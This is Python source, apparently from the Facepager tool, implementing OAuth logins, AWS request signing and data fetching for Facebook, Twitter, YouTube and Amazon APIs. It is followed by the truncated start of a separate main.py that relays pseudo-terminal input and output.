self.logMessage('Login server listening at http://localhost:%d.' % port)
@Slot()
def stopLoginServer(self):
if self.loginServerInstance is not None:
self.loginServerInstance.shutdown()
self.logMessage('Login server stopped.')
self.loginServerInstance = None
def onLoginServerRedirect(self, path):
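        # Called by the local login server with the redirect path; on a successful token
        # exchange the server is stopped and a feedback page URL is returned for the browser.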
options = self.getSettings()
url = options['redirect_uri'] + path
if self.getOAuth2Token(url):
self.stopLoginServer()
return "https://strohne.github.io/Facepager/oauth_feedback.html"
else:
return None
@Slot()
def initSession(self, no=0, renew=False):
"""
Dispatch session initialization to specialized functions
:param no: session number
:return: session object
"""
options = self.getSettings()
if options.get('auth_type') == 'OAuth1':
return self.initOAuth1Session(no, renew)
else:
return self.initOAuth2Session(no, renew)
def initOAuth1Session(self,no=0, renew=False):
"""
Return session or create if necessary
:param no: session number
:return: session object
"""
while (len(self.sessions) <= no):
self.sessions.append(None)
session = self.sessions[no] if not renew else None
if session is None:
if (self.tokenEdit.text() == '') or (self.tokensecretEdit.text() == ''):
raise Exception("No access, login please!")
service = self.getOAuth1Service()
session = service.get_session((self.tokenEdit.text(), self.tokensecretEdit.text()))
self.sessions[no] = session
return session
def initOAuth2Session(self, no=0, renew=False):
return super(AuthTab, self).initSession(no, renew)
def getOAuth1Service(self):
if not hasattr(self,'oauthdata'):
self.oauthdata = {}
service = OAuth1Service(
consumer_key=self.defaults.get('client_id'),
consumer_secret=self.defaults.get('client_secret'),
name='oauth1',
access_token_url=self.defaults.get('access_token_url'),
authorize_url=self.defaults.get('authorize_url'),
request_token_url=self.defaults.get('request_token_url'),
base_url=self.defaults.get('basepath'))
# clientid = self.getClientId()
# if clientid is None:
# return None
service.consumer_key = self.clientIdEdit.text() if self.clientIdEdit.text() != "" else \
self.defaults['client_id']
service.consumer_secret = self.clientSecretEdit.text() if self.clientSecretEdit.text() != "" else \
self.defaults['client_secret']
service.base_url = self.basepathEdit.currentText().strip() if self.basepathEdit.currentText().strip() != "" else \
self.defaults['basepath']
if service.consumer_key == '':
raise Exception('Consumer key is missing, please adjust settings!')
if service.consumer_secret == '':
raise Exception('Consumer secret is missing, please adjust settings!')
return service
def getOAuth1Token(self, url):
success = False
url = urllib.parse.parse_qs(url)
if "oauth_verifier" in url:
token = url["oauth_verifier"]
if token:
service = self.getOAuth1Service()
self.oauthdata['oauth_verifier'] = token[0]
session = service.get_auth_session(self.oauthdata['requesttoken'],
self.oauthdata['requesttoken_secret'], method="POST",
data={'oauth_verifier': self.oauthdata['oauth_verifier']})
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(session)
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
self.tokenEdit.setText(session.access_token)
self.tokensecretEdit.setText(session.access_token_secret)
session.close()
success = True
return success
def getOAuth2Token(self, url):
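        # Authorization code grant: extract the code from the redirect URL and exchange it
        # at the token URI for an access token, which is then stored in the token field.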
success = False
try:
options = self.getSettings()
urlparsed = urlparse(url)
query = parse_qs(urlparsed.query)
if url.startswith(options['redirect_uri']) and query.get('code') is not None:
try:
clientid = self.clientIdEdit.text() if self.clientIdEdit.text() != "" \
else self.defaults.get('client_id', '')
clientsecret = self.clientSecretEdit.text() if self.clientSecretEdit.text() != "" \
else self.defaults.get('client_secret', '')
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else \
self.defaults.get('scope', None)
headers = options.get("headers",{})
headers = {key.lower(): value for (key, value) in headers.items()}
session = OAuth2Session(clientid, redirect_uri=options['redirect_uri'], scope=scope)
token = session.fetch_token(
options['token_uri'],
authorization_response=str(url),
client_secret=clientsecret,
headers=headers
)
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(token.get('access_token',''))
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
self.tokenEdit.setText(token.get('access_token',''))
try:
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
except AttributeError:
pass
success = True
finally:
session.close()
elif url.startswith(options['redirect_uri']) and query.get('error') is not None:
self.logMessage(f"Login error: {query.get('error')}")
except Exception as e:
self.logMessage(e)
return success
# Get Client ID
# return custom client ID if provided
# otherwise login to Facepager and return preregistered ID
# or return None if login fails
def getClientId(self):
if self.clientIdEdit.text() != "":
self.auth_preregistered = False
clientid = self.clientIdEdit.text()
else:
self.auth_preregistered = True
clientid = self.defaults.get('client_id', '')
if clientid == '':
raise Exception('Client ID missing, please adjust settings!')
termsurl = self.defaults.get('termsurl', '')
if termsurl != '':
proceedDlg = PreLoginWebDialog(self.mainWindow, "Login to Facepager", termsurl)
if proceedDlg.show() != QDialog.Accepted:
return None
return clientid
# Retrieves a user ID from the API that
# later is hashed for maintaining the
# anonymized user list. REimplement in the modules.
def getUserId(self):
return None
def authorizeUser(self, userid):
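        # Derive an anonymized token from the user ID (PBKDF2-HMAC-SHA256 with the app salt)
        # and ask the Facepager server whether this user is registered; sets auth_userauthorized.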
# User ID
if userid is None:
self.auth_userauthorized = False
return False
# App salt
salt = getDictValueOrNone(credentials,'facepager.salt')
if salt is None:
self.auth_userauthorized = False
return False
# Create token
usertoken = hashlib.pbkdf2_hmac(
'sha256', # The hash digest algorithm for HMAC
userid.encode("utf-8"),
salt.encode("utf-8"),
100000 # It is recommended to use at least 100,000 iterations of SHA-256
)
# Check token
authurl = getDictValueOrNone(credentials, 'facepager.url')
if authurl is None:
self.auth_userauthorized = False
return False
authurl += '?module='+self.name.lower()+'&usertoken='+usertoken.hex()
session = self.initOAuth2Session(0, True)
data, headers, status = self.request(0, authurl)
self.closeSession(0)
self.auth_userauthorized = status == 'fetched (200)'
return self.auth_userauthorized
class GenericTab(AuthTab):
def __init__(self, mainWindow=None):
super(GenericTab, self).__init__(mainWindow, "Generic")
#Defaults
self.timeout = 60
self.defaults['basepath'] = '<Object ID>'
# Standard inputs
self.initInputs()
# Header, Verbs
self.initHeaderInputs()
self.initVerbInputs()
self.initUploadFolderInput()
# Extract input
self.initPagingInputs(True)
self.initResponseInputs(True)
self.initFileInputs()
# Login inputs
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(GenericTab, self).getSettings(purpose)
if purpose != 'preset':
options['querytype'] = self.name + ':'+options['basepath']+options['resource']
return options
# def onSslErrors(self, reply, errors):
# url = str(reply.url().toString())
# reply.ignoreSslErrors()
# self.logmessage.emit("SSL certificate error ignored: %s (Warning: Your connection might be insecure!)" % url)
class FacebookTab(AuthTab):
def __init__(self, mainWindow=None):
super(FacebookTab, self).__init__(mainWindow, "Facebook")
# Authorization
self.auth_userauthorized = False
#Defaults
self.defaults['auth_type'] = "OAuth2"
self.defaults['scope'] = '' #user_groups
self.defaults['basepath'] = 'https://graph.facebook.com/v3.4'
self.defaults['resource'] = '/<Object ID>'
self.defaults['auth_uri'] = 'https://www.facebook.com/dialog/oauth'
self.defaults['redirect_uri'] = 'https://www.facebook.com/connect/login_success.html'
self.defaults['login_buttoncaption'] = " Login to Facebook "
# Query Box
self.initInputs()
# Pages Box
self.initPagingInputs()
self.initAuthSettingsInputs()
self.initLoginInputs(toggle=False)
self.loadDoc()
self.loadSettings()
def initAuthSettingsInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0,0,0,0)
self.authWidget.setLayout(authlayout)
self.pageIdEdit = QLineEdit()
authlayout.addRow("Page Id", self.pageIdEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes",self.scopeEdit)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(FacebookTab, self).getSettings(purpose)
options['auth'] = 'param'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'access_token'
if purpose != 'preset':
options['pageid'] = self.pageIdEdit.text().strip()
return options
def setSettings(self, settings ={}):
settings = super(FacebookTab, self).setSettings(settings)
if 'pageid' in settings:
self.pageIdEdit.setText(settings.get('pageid'))
return settings
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
            raise Exception('You are not authorized, please log in!')
if options.get('access_token','') == '':
            raise Exception('Access token is missing, please log in!')
self.connected = True
self.speed = options.get('speed',None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
session_no = options.get('threadnumber', 0)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# # Abort condition for time based pagination
# since = options['params'].get('since', False)
# if (since != False):
# since = dateutil.parser.parse(since, yearfirst=True, dayfirst=False)
# since = int((since - datetime(1970, 1, 1)).total_seconds())
# Abort condition: maximum page count
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options['currentpage'] = page
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
options['querytime'] = str(datetime.now())
data, headers, status = self.request(session_no,urlpath, urlparams)
options['ratelimit'] = False
options['querystatus'] = status
# rate limit info
if 'x-app-usage' in headers:
appusage = json.loads(headers['x-app-usage'])
                appusage = appusage.get('call_count', 0)  # default to 0 so the numeric comparison below cannot fail
                if appusage > 0:
options['info'] = {'x-app-usage': "{} percent of app level rate limit reached.".format(appusage)}
if (status != "fetched (200)"):
msg = getDictValue(data,"error.message")
code = getDictValue(data,"error.code")
logMessage("Error '{0}' for {1} with message {2}.".format(status, nodedata['objectid'], msg))
# see https://developers.facebook.com/docs/graph-api/using-graph-api
# see https://developers.facebook.com/docs/graph-api/advanced/rate-limiting/
if (code in ['4','17','32','613']) and (status in ['error (400)', 'error (403)']):
options['ratelimit'] = True
else:
options['ratelimit'] = False
logData(data, options, headers)
if logProgress is not None:
logProgress({'page':page+1})
# paging
options = self.updatePagingOptions(data, options)
if options is None:
break
# # abort time based pagination
# until = params.get('until', False)
# if (since != False) and (until != False) and (int(until) < int(since)):
# break
if not self.connected:
break
@Slot()
def doLogin(self, session_no = 0):
try:
#use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope= self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope','')
url = self.defaults['auth_uri'] +"?client_id=" + clientid + "&redirect_uri="+self.defaults['redirect_uri']+"&response_type=token&scope="+scope+"&display=popup"
caption = "Facebook Login Page"
self.showLoginWindow(caption, url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",str(e),QMessageBox.StandardButton.Ok)
def getUserId(self, token):
data, headers, status = self.request(
None, self.basepathEdit.currentText().strip() +
'/me?fields=id&access_token=' + token)
if status != 'fetched (200)':
return None
return data.get('id')
@Slot(QUrl)
def onLoginWindowChanged(self, url):
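        # Facebook uses the OAuth2 implicit flow: the access token arrives in the URL
        # fragment of the redirect page and is extracted here (optionally swapped for a page token).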
if "#access_token" in url.toString():
try:
url = urllib.parse.urlparse(url.toString(),allow_fragments=True)
fragment = urllib.parse.parse_qs(url.fragment)
token = fragment.get('access_token').pop()
# Get user ID
if self.auth_preregistered:
userid = self.getUserId(token)
if userid is None:
raise Exception("Could not retrieve user ID. Check settings and try again.")
self.authorizeUser(userid)
if not self.auth_userauthorized:
raise Exception("You are not registered at Facepager.")
# Get page access token
pageid = self.pageIdEdit.text().strip()
if pageid != '':
data, headers, status = self.request(None, self.basepathEdit.currentText().strip()+'/'+pageid+'?fields=access_token&scope=pages_show_list&access_token='+token)
if status != 'fetched (200)':
raise Exception("Could not authorize for page. Check page ID in the settings.")
token = data.get('access_token','')
# Set token
self.tokenEdit.setText(token)
except Exception as e:
QMessageBox.critical(self,"Login error",
str(e),QMessageBox.StandardButton.Ok)
self.closeLoginWindow()
class AmazonTab(AuthTab):
# see YoutubeTab for keys in the options-parameter
def __init__(self, mainWindow=None, name='Amazon'):
super(AmazonTab, self).__init__(mainWindow, name)
self.defaults['region'] = 'us-east-1' # 'eu-central-1'
self.defaults['service'] = 's3'
self.defaults['format'] = 'xml'
# Standard inputs
self.initInputs()
# Header, Verbs
self.initHeaderInputs()
self.initVerbInputs()
self.initUploadFolderInput()
# Extract input
self.initResponseInputs(True)
# Pages Box
self.initPagingInputs(True)
# Login inputs
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def initLoginInputs(self):
# token and login button
loginwidget = QWidget()
loginlayout = QHBoxLayout()
loginlayout.setContentsMargins(0, 0, 0, 0)
loginwidget.setLayout(loginlayout)
self.accesskeyEdit = QLineEdit()
self.accesskeyEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.accesskeyEdit)
loginlayout.addWidget(QLabel('Secret Key'))
self.secretkeyEdit = QLineEdit()
self.secretkeyEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.secretkeyEdit)
loginlayout.addWidget(QLabel('Service'))
self.serviceEdit = QLineEdit()
loginlayout.addWidget(self.serviceEdit)
loginlayout.addWidget(QLabel('Region'))
self.regionEdit = QLineEdit()
loginlayout.addWidget(self.regionEdit)
self.extraLayout.addRow("Access Key", loginwidget)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(AmazonTab, self).getSettings(purpose)
options['auth'] = 'disable'
#options['format'] = self.defaults.get('format', '')
options['service'] = self.serviceEdit.text().strip() if self.serviceEdit.text() != "" else self.defaults.get('service', '')
options['region'] = self.regionEdit.text().strip() if self.regionEdit.text() != "" else self.defaults.get(
'region', '')
if purpose != 'preset':
options['secretkey'] = self.secretkeyEdit.text().strip() #if self.secretkeyEdit.text() != "" else self.defaults.get('auth_uri', '')
options['accesskey'] = self.accesskeyEdit.text().strip() #if self.accesskeyEdit.text() != "" else self.defaults.get('redirect_uri', '')
return options
def setSettings(self, settings = {}):
settings = super(AmazonTab, self).setSettings(settings)
if 'secretkey' in settings:
self.secretkeyEdit.setText(settings.get('secretkey'))
if 'accesskey' in settings:
self.accesskeyEdit.setText(settings.get('accesskey'))
self.serviceEdit.setText(settings.get('service'))
self.regionEdit.setText(settings.get('region'))
return settings
# Get authorization header
# See https://docs.aws.amazon.com/de_de/general/latest/gr/sigv4-signed-request-examples.html
def signRequest(self, urlpath, urlparams, headers, method, payload, options):
# Access keys
access_key = options.get('accesskey', '')
secret_key = options.get('secretkey', '')
region = options.get('region', '')
service = options.get('service', '')
if access_key == '' or secret_key == '':
raise Exception('Access key or secret key is missing, please fill the input fields!')
# Key derivation functions. See:
# http://docs.aws.amazon.com/general/latest/gr/signature-v4-examples.html#signature-v4-examples-python
def sign(key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def getSignatureKey(key, dateStamp, regionName, serviceName):
kDate = sign(('AWS4' + key).encode('utf-8'), dateStamp)
kRegion = sign(kDate, regionName)
kService = sign(kRegion, serviceName)
kSigning = sign(kService, 'aws4_request')
return kSigning
timenow = datetime.utcnow()
amzdate = timenow.strftime('%Y%m%dT%H%M%SZ')
datestamp = timenow.strftime('%Y%m%d') # Date w/o time, used in credential scope
# Create canonical URI--the part of the URI from domain to query string
urlcomponents = urllib.parse.urlparse(urlpath)
canonical_uri = '/' if urlcomponents.path == '' else urlcomponents.path
# Create the canonical query string. In this example (a GET request),
# request parameters are in the query string. Query string values must
# be URL-encoded (space=%20). The parameters must be sorted by name.
# For this example, the query string is pre-formatted in the request_parameters variable.
urlparams = {} if urlparams is None else urlparams
canonical_querystring = OrderedDict(sorted(urlparams.items()))
canonical_querystring = urllib.parse.urlencode(canonical_querystring)
# Create the canonical headers and signed headers. Header names
# must be trimmed and lowercase, and sorted in code point order from
# low to high. Note that there is a trailing \n.
canonical_headers = {
'host': urlcomponents.hostname,
'x-amz-date': amzdate
}
if headers is not None:
canonical_headers.update(headers)
canonical_headers = {k.lower(): v for k, v in list(canonical_headers.items())}
canonical_headers = OrderedDict(sorted(canonical_headers.items()))
canonical_headers_str = "".join(
[key + ":" + value + '\n' for (key, value) in canonical_headers.items()])
# Create the list of signed headers. This lists the headers
# in the canonical_headers list, delimited with ";" and in alpha order.
# Note: The request can include any headers; canonical_headers and
# signed_headers lists those that you want to be included in the
# hash of the request. "Host" and "x-amz-date" are always required.
signed_headers = ';'.join(list(canonical_headers.keys()))
# Create payload hash (hash of the request body content). For GET
# requests, the payload is an empty string ("").
payload = b'' if payload is None else payload
if isinstance(payload, BufferReader):
payload_buffer = payload
payload = payload_buffer.read()
payload_buffer.rewind()
#payload = payload.decode('utf-8')
payload_hash = hashlib.sha256(payload).hexdigest()
# Combine elements to create canonical request
canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers_str + '\n' + signed_headers + '\n' + payload_hash
# Match the algorithm to the hashing algorithm you use, either SHA-1 or
# SHA-256 (recommended)
algorithm = 'AWS4-HMAC-SHA256'
credential_scope = datestamp + '/' + region + '/' + service + '/' + 'aws4_request'
string_to_sign = algorithm + '\n' + amzdate + '\n' + credential_scope + '\n' + hashlib.sha256(
canonical_request.encode('utf-8')).hexdigest()
# Create the signing key using the function defined above.
signing_key = getSignatureKey(secret_key, datestamp, region, service)
# Sign the string_to_sign using the signing_key
signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest()
# The signing information can be either in a query string value or in
# a header named Authorization. This code shows how to use a header.
# Create authorization header and add to request headers
authorization_header = algorithm + ' ' + 'Credential=' + access_key + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature
# The request can include any headers, but MUST include "host", "x-amz-date",
# and (for this scenario) "Authorization". "host" and "x-amz-date" must
# be included in the canonical_headers and signed_headers, as noted
# earlier. Order here is not significant.
# Python note: The 'host' header is added automatically by the Python 'requests' library.
headers.update({'x-amz-date': amzdate,
'x-amz-content-sha256': payload_hash,
# 'x-amz-content-sha256':'UNSIGNED-PAYLOAD',
'Authorization': authorization_header
# 'Accepts': 'application/json'
})
return (headers)
class TwitterTab(AuthTab):
def __init__(self, mainWindow=None):
super(TwitterTab, self).__init__(mainWindow, "Twitter")
# Authorization
self.auth_userauthorized = False
# Defaults
self.defaults['basepath'] = 'https://api.twitter.com/1.1'
self.defaults['resource'] = '/search/tweets'
self.defaults['params'] = {'q': '<Object ID>'}
#self.defaults['extension'] = ".json"
self.defaults['auth_type'] = 'OAuth1'
self.defaults['access_token_url'] = 'https://api.twitter.com/oauth/access_token'
self.defaults['authorize_url'] = 'https://api.twitter.com/oauth/authorize'
self.defaults['request_token_url'] = 'https://api.twitter.com/oauth/request_token'
self.defaults['login_window_caption'] = 'Twitter Login Page'
# Query and Parameter Box
self.initInputs()
self.initPagingInputs()
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
def initLoginInputs(self):
# Login-Boxes
loginlayout = QHBoxLayout()
self.tokenEdit = QLineEdit()
self.tokenEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokenEdit)
loginlayout.addWidget(QLabel("Access Token Secret"))
self.tokensecretEdit = QLineEdit()
self.tokensecretEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokensecretEdit)
self.authButton = QPushButton('Settings', self)
self.authButton.clicked.connect(self.editAuthSettings)
loginlayout.addWidget(self.authButton)
self.loginButton = QPushButton(" Login to Twitter ", self)
self.loginButton.clicked.connect(self.doLogin)
loginlayout.addWidget(self.loginButton)
# Add to main-Layout
self.extraLayout.addRow("Access Token", loginlayout)
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0, 0, 0, 0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit= QComboBox()
self.authTypeEdit.addItems(['OAuth1', 'OAuth2 Client Credentials'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Consumer Key", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Consumer Secret", self.clientSecretEdit)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(TwitterTab, self).getSettings(purpose)
if options['auth_type'] == 'OAuth2 Client Credentials':
options['auth_uri'] = 'https://api.twitter.com/oauth2/token/'
options['auth'] = 'header'
options['auth_prefix'] = 'Bearer '
options['auth_tokenname'] = "Authorization"
return options
def getUserId(self, session):
# Send request
response = session.request('GET', 'https://api.twitter.com/1.1/account/settings.json', timeout=self.timeout)
if not response.ok :
return None
data = response.json() if response.text != '' else []
return getDictValueOrNone(data, 'screen_name')
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
            raise Exception('You are not authorized, please log in!')
self.connected = True
self.speed = options.get('speed', None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
session_no = options.get('threadnumber',0)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options = deepcopy(options)
options['currentpage'] = page
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
data, headers, status = self.request(session_no, urlpath, urlparams, requestheaders)
options['querytime'] = str(datetime.now())
options['querystatus'] = status
options['ratelimit'] = (status == "error (429)")
# rate limit info
if 'x-rate-limit-remaining' in headers:
options['info'] = {'x-rate-limit-remaining': "{} requests remaining until rate limit".format(
headers['x-rate-limit-remaining'])}
logData(data, options, headers)
if logProgress is not None:
logProgress({'page': page + 1})
# Pagination
paging = self.updatePagingOptions(data, options)
# paging with next_results; Note: Do not rely on the search_metadata information,
# sometimes the next_results param is missing, this is a known bug
# applies to /search/tweets
if (paging is None) and isinstance(data, dict) and hasDictValue(data, "search_metadata.next_results"):
paging = options
url, params = self.parseURL(getDictValue(data, "search_metadata.next_results", False))
options['url'] = urlpath
options['params'] = params
# Workaround for Twitter bug (carry on tweet_mode=extended)
if 'tweet_mode' in urlparams:
options['params']['tweet_mode'] = urlparams['tweet_mode']
if paging is not None:
options = paging
else:
break
if not self.connected:
break
class TwitterStreamingTab(TwitterTab):
def __init__(self, mainWindow=None):
super(TwitterTab, self).__init__(mainWindow, "Twitter Streaming")
# Authorization
self.auth_userauthorized = False
self.defaults['auth_type'] = 'OAuth1'
self.defaults['access_token_url'] = 'https://api.twitter.com/oauth/access_token'
self.defaults['authorize_url'] = 'https://api.twitter.com/oauth/authorize'
self.defaults['request_token_url'] = 'https://api.twitter.com/oauth/request_token'
self.defaults['login_window_caption'] = 'Twitter Login Page'
self.defaults['basepath'] = 'https://stream.twitter.com/1.1'
self.defaults['resource'] = '/statuses/filter'
self.defaults['params'] = {'track': '<Object ID>'}
#self.defaults['extension'] = ".json"
self.defaults['key_objectid'] = 'id'
self.defaults['key_nodedata'] = None
# Query Box
self.initInputs()
self.initAuthSetupInputs()
self.initLoginInputs()
self.loadDoc()
self.loadSettings()
self.timeout = 30
self.connected = False
def stream(self, session_no=0, path='', args=None, headers=None):
self.connected = True
self.retry_counter=0
self.last_reconnect=QDateTime.currentDateTime()
try:
session = self.initSession(session_no)
def _send():
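                # Issue the streaming request; on a non-200 response retry up to five times with
                # a 3 second pause, resetting the counter if the last reconnect is over two minutes old.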
self.last_reconnect = QDateTime.currentDateTime()
while self.connected:
try:
if headers is not None:
response = session.post(path, params=args,
headers=headers,
timeout=self.timeout,
stream=True)
else:
response = session.get(path, params=args, timeout=self.timeout,
stream=True)
except requests.exceptions.Timeout:
raise Exception('Request timed out.')
else:
if response.status_code != 200:
if self.retry_counter<=5:
self.logMessage("Reconnecting in 3 Seconds: " + str(response.status_code) + ". Message: "+ str(response.content))
time.sleep(3)
if self.last_reconnect.secsTo(QDateTime.currentDateTime())>120:
self.retry_counter = 0
_send()
else:
self.retry_counter+=1
_send()
else:
#self.connected = False
self.disconnectSocket()
raise Exception("Request Error: " + str(response.status_code) + ". Message: "+str(response.content))
return response
while self.connected:
response = _send()
if response:
status = 'fetched' if response.ok else 'error'
status = status + ' (' + str(response.status_code) + ')'
headers = dict(list(response.headers.items()))
for line in response.iter_lines():
if not self.connected:
break
if line:
try:
data = json.loads(line)
except ValueError: # pragma: no cover
raise Exception("Unable to decode response, not valid JSON")
else:
yield data, headers, status
else:
break
response.close()
except AttributeError:
#This exception is thrown when canceling the connection
#Only re-raise if not manually canceled
if self.connected:
raise
finally:
self.connected = False
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
            raise Exception('You are not authorized, please log in!')
if not ('url' in options):
urlpath = options["basepath"] + options["resource"] + options.get('extension', '')
urlpath, urlparams, templateparams = self.getURL(urlpath, options["params"], nodedata, options)
else:
urlpath = options['url']
urlparams = options["params"]
if options['logrequests']:
logpath = self.getLogURL(urlpath, urlparams, options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
self.timeout = options.get('timeout',30)
self.maxsize = options.get('maxsize', 5)
# data
session_no = options.get('threadnumber',0)
for data, headers, status in self.stream(session_no, path=urlpath, args=urlparams):
# data
options['querytime'] = str(datetime.now())
options['querystatus'] = status
logData(data, options, headers)
class YoutubeTab(AuthTab):
def __init__(self, mainWindow=None):
super(YoutubeTab, self).__init__(mainWindow, "YouTube")
# Authorization
self.auth_userauthorized = False
# Defaults
self.defaults['auth_type'] = "OAuth2 External"
self.defaults['auth_uri'] = 'https://accounts.google.com/o/oauth2/auth'
self.defaults['token_uri'] = "https://accounts.google.com/o/oauth2/token"
self.defaults['redirect_uri'] = 'https://localhost'
self.defaults['scope'] = "https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.readonly https://www.googleapis.com/auth/youtube.force-ssl"
self.defaults['response_type'] = "code"
self.defaults['login_buttoncaption'] = " Login to Google "
self.defaults['login_window_caption'] = "YouTube Login Page"
self.defaults['auth'] = 'param'
self.defaults['basepath'] = "https://www.googleapis.com/youtube/v3"
self.defaults['resource'] = '/search'
self.defaults['params'] = {'q':'<Object ID>','part':'snippet','maxResults':'50'}
# Standard inputs
self.initInputs()
# Pages Box
self.initPagingInputs()
# Login inputs
self.initAuthSetupInputs()
self.initLoginInputs(False)
self.loadDoc()
self.loadSettings()
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0,0,0,0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit= QComboBox()
self.authTypeEdit.addItems(['OAuth2', 'OAuth2 External','API key'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Secret", self.clientSecretEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes",self.scopeEdit)
def getUserId(self, token):
data, headers, status = self.request(
None, 'https://www.googleapis.com/youtube/v3/channels?mine=true&access_token='+token)
if status != 'fetched (200)':
return None
return getDictValueOrNone(data,'items.0.id')
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(YoutubeTab, self).getSettings(purpose)
if options.get('auth_type') == 'API key':
options['auth'] = 'param'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'key'
else: # OAuth2
options['auth'] = 'header'
options['auth_prefix'] = 'Bearer '
options['auth_tokenname'] = 'Authorization'
return options
# https://stackoverflow.com/questions/10123929/python-requests-fetch-a-file-from-a-local-url
class LocalFileAdapter(requests.adapters.BaseAdapter):
"""Protocol Adapter to allow Requests to GET file:// URLs
@todo: Properly handle non-empty hostname portions.
"""
@staticmethod
def _chkpath(method, path):
"""Return an HTTP status for the given filesystem path."""
if method.lower() in ('put', 'delete'):
return 501, "Not Implemented" # TODO
elif method.lower() not in ('get', 'head'):
return 405, "Method Not Allowed"
elif os.path.isdir(path):
return 400, "Path Not A File"
elif not os.path.isfile(path):
return 404, "File Not Found"
elif not os.access(path, os.R_OK):
return 403, "Access Denied"
else:
return 200, "OK"
def send(self, req, **kwargs): # pylint: disable=unused-argument
"""Return the file specified by the given request
@type req: C{PreparedRequest}
@todo: Should I bother filling `response.headers` and processing
If-Modified-Since and friends using `os.stat`?
"""
path = os.path.normcase(os.path.normpath(url2pathname(req.path_url)))
response = requests.Response()
response.status_code, response.reason = self._chkpath(req.method, path)
if response.status_code == 200 and req.method.lower() != 'head':
try:
response.raw = open(path, 'rb')
response.encoding = cchardet.detect(response.content)['encoding']
except (OSError, IOError) as err:
response.status_code = 500
response.reason = str(err)
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
response.request = req
response.connection = self
return response
def close(self):
pass
class DataTooBigError(Exception):
pass
|
main.py
|
#!/usr/bin/env python3
import os
import sys
import select
import termios
import copy
from threading import Lock, Thread
from terminal import Terminal
def io_func(tty):
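    # Pump bytes in both directions: pseudo-terminal output goes to stdout,
    # local keystrokes from stdin are written to the pseudo-terminal.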
while True:
rlist, wlist, xlist = select.select([sys.stdin, tty.tty_fd], [], [])
if tty.tty_fd in rlist:
out = tty.read(1000)
sys.stdout.buffer.write(out)
sys.stdout.flush()
if sys.stdin in rlist:
# XXX: ***SLIGHTLY*** inefficient
